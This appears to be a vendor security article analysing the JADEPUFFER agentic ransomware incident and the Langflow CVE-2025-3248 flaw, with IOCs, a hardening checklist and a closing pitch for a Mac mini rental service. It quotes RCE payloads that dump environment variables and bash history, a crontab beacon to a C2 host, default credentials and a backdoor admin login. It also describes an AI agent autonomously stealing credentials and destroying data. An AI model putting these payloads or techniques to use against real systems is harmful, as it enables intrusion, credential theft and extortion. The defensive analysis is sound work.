2026 JADEPUFFER: First Agentic Ransomware Attack and Mac Mini M4 Secure Deployment Guide
On July 1, 2026, cloud security firm Sysdig Threat Research Team (TRT) published a report on codename JADEPUFFER — assessed as the first known end-to-end ransomware operation fully driven by a large language model Agent: from reconnaissance and credential theft through lateral movement, persistence, destructive encryption, and ransom-note delivery, with no human manual intervention at critical stages. The attacker is classified as an Agentic Threat Actor (ATA). Entry was a publicly exposed Langflow instance (CVE-2025-3248); the real target was a separate publicly exposed MySQL + Alibaba Nacos production server. Sysdig captured 600+ independent purposeful payloads. This guide covers the full attack chain, IOCs, defense recommendations, a five-step hardening checklist, and a Mac Mini M4 isolation deployment matrix.
1. Three pain points: what AI Agent deployers must audit now
- Public Langflow is a high-risk entry point: CVE-2025-3248 (CVSS 9.8) allows unauthenticated RCE. CISA added it to the Known Exploited Vulnerabilities catalog on May 5, 2025; SentinelOne reports an EPSS exploitation probability of 91.42%. The same flaw also delivers the Flodrix botnet — confirming sustained public scanning and weaponization.
- Agent environments are credential goldmines: JADEPUFFER parallel-scanned Langflow hosts for OpenAI, Anthropic, DeepSeek, and Gemini API keys, plus
ALIBABA_/ALIYUN_/TENCENT_/HUAWEI_and AWS/GCP/Azure cloud credentials — a typical rushed AI orchestration server configuration. - Old vulnerabilities + AI automation = near-zero weaponization cost: The downstream target exploited a 2021 Nacos auth bypass (CVE-2021-29441) and a never-rotated default JWT signing key. An Agent makes "spray the entire historical vulnerability library" nearly free — especially when combined with LLMjacking (stolen credentials driving the Agent), where attackers pay almost no compute bill themselves.
2. Event overview and the ATA concept
Discovery credit goes to Sysdig TRT; report author Michael Clark (Director of Threat Research). Some outlets picked up the story on July 6, but the primary technical report was published July 1, 2026.
Sysdig's core assessment: this is the first operation where an LLM Agent chained reconnaissance through extortion without human intervention at key stages — not traditional ransomware where operators manually drive each phase. The new classification ATA (Agentic Threat Actor) describes actors whose attack capability is delivered by an AI Agent rather than a human-driven toolset.
Two-stage target structure:
- Entry host: publicly exposed Langflow instance (CVE-2025-3248)
- Primary target: a separate publicly exposed production server running MySQL + Alibaba Nacos configuration center
The full attack completed within a compressed time window. Sysdig captured 600+ independent, purposeful payloads executed across multiple sessions over several weeks.
3. Full timeline
| Date | Event |
|---|---|
| April 2025 | Langflow CVE-2025-3248 disclosed (unauthenticated code injection / RCE) |
| 2025-05-05 | CISA adds CVE-2025-3248 to Known Exploited Vulnerabilities catalog |
| 2025 | Same vulnerability used to deliver Flodrix botnet (Trend Micro, independent of JADEPUFFER) |
| June 2026 | JADEPUFFER attacks public Langflow instances; full chain executed across multiple sessions |
| 2026-07-01 | Sysdig publishes full technical report — first public disclosure |
| 2026-07-02 to 07-06 | Dark Reading, BleepingComputer, CyberScoop, CSO Online, Security Affairs follow up |
4. CVE-2025-3248 technical analysis
| Field | Detail |
|---|---|
| Component | Langflow — open-source visual AI Agent workflow framework, 70,000+ GitHub stars |
| Vulnerability type | CWE-94 (code injection) + CWE-306 (missing authentication on critical function) |
| CVSS | 9.8 Critical, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Affected versions | All Langflow versions before 1.3.0 |
| Vulnerable endpoint | /api/v1/validate/code |
| Fixed in | 1.3.0 (authentication added) |
4.1 Root cause step by step
- Langflow exposes
/api/v1/validate/codeso the visual orchestration UI can validate custom function node syntax. - Implementation: user code is parsed with
ast.parse(), compiled withcompile(), then executed viaexec(). - Critical flaw: no authentication and no sandbox isolation throughout.
- Exploitation technique: in Python, decorators and default parameter values are evaluated at function definition time; attackers embed malicious code in defaults or decorators, and it executes during Langflow's "legitimacy check."
- Attackers need no login — a crafted HTTP POST achieves RCE.
4.2 Real payload examples from Flodrix activity (Trend Micro forensics, independent of JADEPUFFER)
exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("cat /root/.bash_history", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("ip addr show", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("systemctl status sshd", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("capsh --print", shell=True))')
Commands map to: confirm privileges, dump environment variables (potential API key leak), read root bash history, network reconnaissance, SSH status, and capability assessment. The chain ultimately downloads Flodrix (a LeetHozer-family ELF binary) to build a DDoS botnet.
4.3 Official patch (Langflow 1.3.0)
post_validate_code now injects _current_user: CurrentActiveUser: FastAPI validates a JWT Bearer Token or x-api-key first; failure returns 401/403 before reaching vulnerable logic. Active-user status is also checked on success.
5. Attack chain Phase 1: compromising the Langflow host
All payloads were Base64-encoded Python delivered through the Langflow RCE endpoint. Langflow attracts attackers because AI Agent servers commonly store LLM API keys and cloud credentials, and teams rushing to production expose it publicly without network controls.
5.1 Reconnaissance and credential harvesting (parallel threads)
The Agent ran id, uname -a, hostname, and other baseline enumeration, then parallel-scanned for:
- LLM API keys: OpenAI, Anthropic, DeepSeek, Gemini
- Cloud credentials:
ALIBABA_,ALIYUN_,TENCENT_,HUAWEI_, and AWS/GCP/Azure - Cryptocurrency wallets and seed phrases
- Database credentials and configuration files
5.2 Local data theft and lateral discovery
The Agent exported Langflow's own PostgreSQL backend (credentials, API keys, user records), staged data locally for review, then deleted staging files to cover tracks. It scanned internal address space and probed databases, object storage, secret stores, and service-discovery endpoints with default credentials.
5.3 MinIO enumeration and adaptive error correction (key forensic detail)
The Agent probed minio.internal:9000 and 127.0.0.1:9000 with default credentials minioadmin:minioadmin, fully enumerating buckets. After finding one containing terraform-state, it targeted extraction of credentials.json.
Adaptive detail: the first request used ?format=json but received an XML response; the next payload immediately switched to an XML parser — a classic probe-error-adapt loop, not a fixed script blindly retrying. Escalation path: anonymous health check, then management API, then authenticated ListBuckets, then targeted GetObject for files containing "credentials" or ".env".
5.4 Persistence
A crontab job beaconed outbound every 30 minutes:
*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"
6. Attack chain Phase 2: compromising the MySQL + Nacos production server
The real target: a publicly exposed production server running MySQL + Alibaba Nacos. Nacos is widely used in Alibaba-ecosystem microservices; its auth system has bypass history including CVE-2021-29441, and the default JWT signing key has been documented publicly since 2020 — many deployments never rotated it.
The Agent connected to the exposed MySQL port using root credentials. Credential origin is unclear; Sysdig did not observe theft from the victim environment — one of the few steps that may have been human-prepared in advance.
6.1 Multi-vector Nacos attack and 31-second self-healing fix
Simultaneous attempts: CVE-2021-29441 auth bypass, default JWT key token forgery, and injecting a backdoor admin xadmin into the backend database using root DB privileges.
| Time (UTC) | Action |
|---|---|
| 19:34:24 | subprocess.run generates bcrypt hash, inserts xadmin admin role |
| 19:34:36 | Login attempt with xadmin:Xploit@2026# — failed |
| 19:34:48 | 12 seconds later, parallel test of nacos:nacos defaults and regenerated admin123 hash |
| 19:35:07 | Abandoned subprocess.run, switched to import bcrypt, deleted corrupted record, rebuilt account |
| 19:35:18 | Login succeeded — 31 seconds from failure to fix |
The repair payload completed delete-diagnose-rebuild-reinsert in one loop. Sysdig notes a human operator diagnosing a subprocess PATH issue and writing a fix script typically takes far longer than 31 seconds.
6.2 Container escape probing (~8 minutes, multiple rounds)
Using MySQL file read/write primitives, the Agent systematically tested container escape: OUTFILE write tests, LOAD_FILE readback, attempts to read /var/run/docker.sock, /proc/1/cgroup, /etc/hostname, and mysql.func UDF loading. Before ransomware, it wrote a completion marker _pwn_cleanup.txt — Sysdig assesses this as an Agent signaling "proceed to next phase," not a human preset script behavior.
6.3 Destructive encryption: 1,342 Nacos configurations
All 1,342 Nacos service configuration entries were encrypted with MySQL AES_ENCRYPT(). Original config_info and his_config_info tables were deleted; a ransom-note table README_RANSOM was created.
Key details:
- Encryption key generated via
uuid4(), printed only to stdout, never stored or exfiltrated — payment may not enable decryption even if the attacker wanted to - Ransom note claims AES-256, but MySQL
AES_ENCRYPT()defaults to AES-128-ECB - Contact email
e78393397@proton.me; Bitcoin address3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy - Two minutes later, a follow-up payload refined the ransom note to state "all 1,342 items encrypted"
6.4 Large-scale destruction and diagnostic error correction
After row-level deletion, the Agent escalated to DROP DATABASE. Code comments stated "high ROI database, prioritize deletion (data backed up to 64.20.53[.]230)" — Sysdig has no independent evidence the backup actually occurred; this reads more like Agent self-narration. When one DROP DATABASE silently failed on foreign key constraints, the next payload automatically added SET GLOBAL FOREIGN_KEY_CHECKS=0 — requiring understanding of why it failed, not blind retry.
7. Four autonomy evidence lines and the Bitcoin mystery
- Self-narrating code: payloads contain extensive natural-language comments explaining each step's rationale, including ROI priority ordering and identifying "which database is largest." Human attackers rarely annotate one-shot
python3 -ccommands this thoroughly; LLM code generation defaults to it. - Machine-speed fault diagnosis and correction: the 31-second Nacos backdoor fix, MinIO JSON/XML adaptation, and abandoning JWT forgery after receiving "custom secret in use" — the strongest autonomy signal is how quickly and how the Agent corrected mistakes.
- Understanding free-text context: parsing unstructured text in the target environment and taking actions only possible after comprehension, recurring across sessions weeks apart.
- The Bitcoin address mystery:
3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLyis the standard P2SH example address from Bitcoin Core documentation, heavily present in LLM training corpora. The chain shows 737 historical transactions totaling roughly 46 BTC; current balance is zero. Sysdig cannot distinguish (a) LLM hallucination or (b) attacker deliberate configuration — a new uncertainty AI autonomy introduces to attack attribution.
8. IOC summary and official defense recommendations
| Type | Indicator |
|---|---|
| C2 / beacon | 45.131.66[.]106; crontab beacon hxxp://45.131.66[.]106:4444/beacon |
| Data staging server | 64.20.53[.]230 (InterServer, AS19318) |
| Entry vulnerability | CVE-2025-3248 (Langflow unauthenticated RCE) |
| Ransom Bitcoin address | 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy |
| Ransom contact email | e78393397@proton.me (no hits in threat intel databases; format differs from known MySQL extortion groups) |
| Ransom table name | README_RANSOM (does not match common names like WARNING or RECOVER_YOUR_DATA — a new naming pattern) |
| Persistence | Crontab beacon every 30 minutes to C2 port 4444 |
8.1 Sysdig official defense recommendations
- Upgrade Langflow to a version fixing CVE-2025-3248; never expose code execution or validation endpoints to the public internet
- Deploy runtime threat detection to identify malicious behavior in database processes
- Do not store LLM API keys or cloud credentials in AI orchestration server environment variables — use dedicated secret management isolated from public-facing processes
- Harden Nacos: rotate default
token.secret.key, upgrade to versions enforcing custom keys, never expose Nacos to the public internet, and do not connect backend databases as root - Do not expose database admin accounts to the public internet; enforce strong unique credentials and source IP restrictions on management ports
- Implement egress control to limit beaconing and access to external databases or staging servers from compromised hosts
- Monitor the IOCs above; watch scheduled tasks making outbound requests and anomalous User-Agent strings
9. Industry and expert reactions
BleepingComputer, Dark Reading, CyberScoop, and Security Affairs covered the story immediately, broadly calling it the "first fully AI-driven ransomware attack" and emphasizing the arrival of the ATA era.
CSO Online interviewed independent security researcher and red team expert Vibhum Dubey, who offered a more measured view: "I'd characterize this more as an evolution in execution rather than a fundamentally new ransomware technique. Attackers have automated reconnaissance, credential theft, and deployment for years — the difference is that this time an AI Agent autonomously chained those phases together without waiting for a human operator's next instruction to make decisions." He also stressed that the real concern is not the final encryption stage but the quiet period before it — when the Agent quietly maps identity systems, privilege relationships, and trust chains while avoiding detection. When one path is blocked, AI switches tactics quickly; each intrusion may look slightly different, breaking traditional detection that assumes predictable attacker paths.
Multiple outlets also linked LLMjacking to this incident: if attackers drive Agents with stolen credentials, the marginal cost of launching complex multi-stage attacks approaches zero — the most alarming economic signal from this case.
10. Sysdig conclusions and significance (four judgments)
- Ransomware is no longer "craft for highly skilled operators": LLM Agents can chain reconnaissance, credential theft, lateral movement, persistence, and destruction without deep attacker expertise. Work that once required highly capable humans now requires a sufficiently capable model.
- Old vulnerabilities are being automated into weapons: the downstream target exploited years-old Nacos issues and unrotated default keys. Agents make "spray the entire historical vulnerability library" nearly free; long-unpatched public systems face rising exposure.
- Intent became "readable" — and that is a defender opportunity: LLMs narrate their goals inside payloads, giving defenders detection and analysis handles they previously lacked.
- "Already backed up" is attacker self-report only: code comments before DROP DATABASE claimed backup to a staging server — not independently verified. Encryption keys were ephemeral and unrecoverable; victims likely cannot restore config data even if they pay.
Sysdig's report closes with a warning: JADEPUFFER is a signal flare — each individual technique used is neither new nor complex. What matters is the AI model chaining them into a complete extortion operation against neglected public infrastructure. The skill bar for running ransomware has dropped to "the cost of running an Agent." When Agents are credential-driven via LLMjacking, attacker marginal cost approaches zero. Defenders should expect rising volume and breadth, treating publicly exposed app servers, unhardened config centers, and database admin accounts reachable from the internet as the first targets.
11. AI Agent deployment decision matrix
| Dimension | Local / public VPS direct deploy | Internal network + VPN self-hosted | Dedicated remote Mac mini M4 node (SFTPMAC) |
|---|---|---|---|
| Public attack surface | High (JADEPUFFER-style entry) | Medium (misconfiguration can still expose) | Low (controlled SSH/SFTP entry; Agent ports not directly exposed) |
| Credential isolation | Poor (env vars coexist with daily tools) | Medium (depends on ops discipline) | Strong (dedicated node + externalized secrets + directory chroot) |
| 24/7 always-on | Unstable on laptops/home machines | Requires self-managed ops | Native launchd supervision + remote monitoring |
| Apple Silicon compatibility | Depends on local hardware | Depends on purchased hardware | Native M4, suited for OpenClaw/Langflow local inference |
| Egress control | Difficult (home networks are permissive) | Configurable but complex | Per-node outbound policy restrictions |
| Team CI/CD integration | Weak | Medium | SFTP/rsync artifact sync + permission audit |
12. Five-step secure deployment checklist
- Audit Langflow/OpenClaw exposure immediately: confirm Langflow is at least version 1.3.0; run
curl -I https://your-host/api/v1/validate/codeto verify public reachability — if reachable without auth, treat as P0: take offline or add VPN. - Externalize and rotate credentials: remove all LLM API keys and cloud credentials from Agent server environment variables; use HashiCorp Vault, cloud Secrets Manager, or CI injection; rotate any credentials at risk of exposure.
- Nacos/MySQL hardening checklist: rotate Nacos
token.secret.key, close public ports, verify no default JWT remains; bind MySQL root to internal IPs, enforce strong passwords andbind-addressrestrictions. - Runtime detection and IOC hunting: deploy database process anomaly detection; hunt crontab outbound connections,
README_RANSOMtables, and connections to45.131.66.106. - Migrate to an isolated Mac node: move Langflow/OpenClaw workflows to a dedicated Mac mini M4 remote node; sync workspaces via SFTP/rsync, physically separated from local browsers, Desktop clients, and production databases — reducing JADEPUFFER-style "entry host as credential vault" risk.
13. Frequently asked questions
Q: What is JADEPUFFER?
Sysdig TRT's codename for the first known end-to-end LLM Agent-driven ransomware operation, disclosed July 1, 2026. The attacker is classified as an Agentic Threat Actor (ATA).
Q: How severe is CVE-2025-3248?
CVSS 9.8 Critical. Unauthenticated RCE on Langflow's /api/v1/validate/code. CISA KEV entry since May 5, 2025; SentinelOne EPSS exploitation probability 91.42%.
Q: Is JADEPUFFER the same as Flodrix?
No. Both exploit CVE-2025-3248, but Flodrix is traditional scripted botnet delivery (Trend Micro). JADEPUFFER is the Sysdig-documented AI Agent ransomware case.
Q: Can paying the ransom recover data?
Very unlikely. Keys were uuid4()-generated, printed to stdout only, never stored or exfiltrated. MySQL AES_ENCRYPT() is AES-128-ECB, not the AES-256 claimed in the note.
Q: Is Bitcoin address 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy real?
It is Bitcoin Core's standard P2SH example address, common in LLM training data. The chain has 737 historical transactions. Sysdig cannot tell if the Agent hallucinated it or the attacker configured it deliberately.
Q: How does Sysdig prove AI autonomy?
Four lines: natural-language payload comments, 31-second multi-step self-healing, free-text context comprehension, and coherent execution of 600+ independent purposeful payloads.
Q: Why Langflow as entry point?
Agent servers store LLM API keys and cloud credentials; teams often expose Langflow publicly without network controls during rushed deployments.
Q: How does Mac Mini M4 rental reduce risk?
Isolating Agent workflows on a dedicated always-on Apple Silicon node separates them from daily environments; credentials stay out of publicly reachable processes, with SFTP isolation and egress controls.
14. Sources
- Sysdig: "JADEPUFFER: Agentic ransomware for automated database extortion" (original technical report, 2026-07-01)
- BleepingComputer: "JadePuffer ransomware used AI agent to automate entire attack"
- Dark Reading: "JadePuffer: The First Complete LLM-Driven Ransomware Attack"
- CyberScoop: "Sysdig clocks first documented case of agentic ransomware"
- CSO Online: "This AI agent autonomously hacked a network..." (includes Vibhum Dubey commentary)
- Security Affairs: "JADEPUFFER: First End-to-End AI-Driven Ransomware Operation"
- Trend Micro: "Critical Langflow Vulnerability (CVE-2025-3248) Actively Exploited to Deliver Flodrix Botnet"
- NVD / SentinelOne / Zscaler — independent CVE-2025-3248 analysis; CISA KEV catalog
Compiled from Sysdig's primary report and public media coverage. AI autonomy and attacker intent assessments are sourced and labeled; this does not constitute legal or threat-attribution conclusions. Last updated: 2026-07-07.
15. Mac Mini M4 rental and SFTPMAC decision bridge
JADEPUFFER exposes a core tension: AI Agent workflows need always-on access and model API calls, but must not share an environment with production credentials and public RCE endpoints. Running Langflow or OpenClaw on a laptop or unhardened VPS means that once a CVE-2025-3248-class entry flaw hits, your LLM API keys, cloud credentials, and lateral paths can be drained automatically within minutes — the same trust-boundary problem as running Claude Desktop locally, but with production data destruction instead of privacy controversy.
A safer path: isolate Agent orchestration on a dedicated always-on Apple Silicon node, physically separated from daily browsing, browser profiles, and production databases. Inject credentials via a secrets manager rather than environment variables. Restrict outbound traffic by policy. Sync workspaces via SFTP/rsync with rollback snapshots. This aligns with the "24/7 remote Mac Agent node" guidance in our Claude Code steganography guide and Mac Mini M4 rental vs purchase decision articles.
If you are deploying Langflow, OpenClaw, or a custom AI Agent gateway, the next step is usually: decouple the Agent from sensitive assets onto an isolatable, auditable Mac mini M4 node that does not directly expose code-execution endpoints. SFTPMAC remote Mac rental provides always-on environments for AI Agent workflows: native Apple Silicon M4 performance, SSH/SFTP directory isolation, launchd supervision, and CI/CD artifact sync — better suited than "rush Langflow onto a public VPS" or "home Mac doubling as Agent plus daily office machine" for teams defending against JADEPUFFER-style ATA attacks. In the Agentic Threat Actor era, renting a dedicated Mac for isolated deployment and continuous uptime is a more pragmatic security investment than betting on patch speed alone.